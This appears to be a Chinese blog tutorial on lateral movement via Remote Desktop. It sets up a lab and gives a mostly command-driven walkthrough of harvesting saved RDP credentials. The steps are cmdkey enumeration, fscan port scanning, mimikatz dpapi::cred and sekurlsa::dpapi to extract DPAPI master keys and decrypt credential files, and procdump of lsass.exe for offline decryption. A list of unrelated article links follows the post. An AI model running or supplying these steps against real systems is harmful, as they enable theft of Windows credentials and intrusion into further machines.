当前位置: 首页 > news >正文

通过远程桌面横向移动(破解凭证)

环境配置

win10 192.168.7.36 10.10.10.128
win7 10.10.10.129 -- 3389
使用windows2019链接2012的远程桌面,注意一定要勾选记住我的凭证,勾选记住我的凭证,勾选记住的我凭证

windows10

windows7

远程桌面链接

凭据的信息收集

cmdkey /list

端口扫描

发现3306端口开启

fscan.exe -h 10.10.10.129 > 1.txt

破解远程桌面凭据 -- 在线

查看凭据文件的绝对路径

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
dir /a \users\admin1$\AppData\Local\Microsoft\Credentials\*

此处较小的是凭证文件

获取凭据的masterkey的guid值(读取凭证文件)

dpapi::cred /in:C:\Users\admin1$\AppData\Local\Microsoft\Credentials\89321D2BF8044A4FB40A2DA8D6B8CCF3

获取内存中所有的MasterKey

privilege::debug
sekurlsa::dpapi

破解

dpapi::cred /in:凭据的绝对路径 /masterkey:materkey的值
dpapi::cred /in:C:\Users\admin1$\AppData\Local\Microsoft\Credentials\89321D2BF8044A4FB40A2DA8D6B8CCF3 /masterkey:4de49b0ac0eb9b0e70f502e58efb27c5369a93c12432aa37e1664daea5718afda1b587c9dde6581dc9cd313ae1b7ddb2a718d7b7a98b74ddbae716213d9475e6

破解凭据 -- 离线

查看凭据文件的绝对路径

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
dir /a \users\admin1$\AppData\Local\Microsoft\Credentials\*

下载目标主机的lsass.exe进程 -- 转储

注意:此处要使用管理员权限

procdump.exe -accepteula -ma lsass.exe lsass1.dump

注意此处将后缀的.dmp去除

准备好了两个文件 lsass.exe的转储文件lsass.dump文件

远程桌面的凭据文件:89321D2BF8044A4FB40A2DA8D6B8CCF3

将这两个文件下载到本地,在你的本地进行破解

将下载回来lsass.dump文件加载到你的内存中

Sekurlsa::minidump lsass1.dump

获取凭据的masterkey的guid值

dpapi::cred /in:89321D2BF8044A4FB40A2DA8D6B8CCF3

获取内存中所有的MasterKey

sekurlsa::dpapi

破解

把文件拖到桌面上

dpapi::cred /in:C:\Users\18484\Desktop\89321D2BF8044A4FB40A2DA8D6B8CCF3 /masterkey:4de49b0ac0eb9b0e70f502e58efb27c5369a93c12432aa37e1664daea5718afda1b587c9dde6581dc9cd313ae1b7ddb2a718d7b7a98b74ddbae716213d9475e6

http://www.dtcms.com/a/354060.html

相关文章:

  • 【51单片机】【protues仿真】 基于51单片机出租车计价器系统
  • 三轴云台之动态性能篇
  • 数字化时代催生变革,楼宇自控系统成为建筑管理新潮流的引领者
  • ESP32S3:开发环境搭建、VSCODE 单步调试、Systemview 分析任务运行情况
  • 北斗导航|接收机自主完好性监测算法综述
  • 【C++】类和对象 --- 类中的6个默认成员函数
  • CAS 浅析
  • 视觉语言模型应用开发——Qwen 2.5 视觉语言模型的零样本学习能力在多模态内容审核中的实践研究
  • 把CentOS 7默认yum源改成腾讯云镜像
  • 阿里云——云存储与数据库服务
  • RustFS架构解密:零GC设计如何实现12μs级存储延迟?
  • 【lucene】SpanNearQuery中的slop
  • 【lucene】SpanFirstQuery的end参数
  • 【Python】包管理,弄明白import,package,module
  • 复杂网络环境实测:主流云VR产品性能对比——平行云LarkXR突破网络限制 引领云VR技术新高度
  • 记住密码管理器
  • 在Eclipse中配置Tomcat
  • 终端美化:Windows11 下 安装 WSL 并使用好看的的 zsh 主题
  • 【图论】最短路算法
  • 802.11ax上行OFDMA接入机制:技术原理与实现细节
  • 流水线用到的Dockerfile和构建脚本build.sh
  • Python电影票房预测模型研究——贝叶斯岭回归Ridge、决策树、Adaboost、KNN分析猫眼豆瓣数据
  • MYSQL---存储过程
  • 【轨物方案】“无人值守”光伏电站智能运维解决方案,赋能绿色能源高效运营
  • 正则表达式 —— 贪婪与非贪婪
  • 汽车盲点检测系统的网络安全分析和设计
  • 【Linux学习】正则表达式学习记录
  • 【鸿蒙开发001】上下翻页-翻书效果实现【可复用】
  • 写一个天气查询Mcp Server
  • 2025年9月计算机二级C++语言程序设计——选择题打卡Day8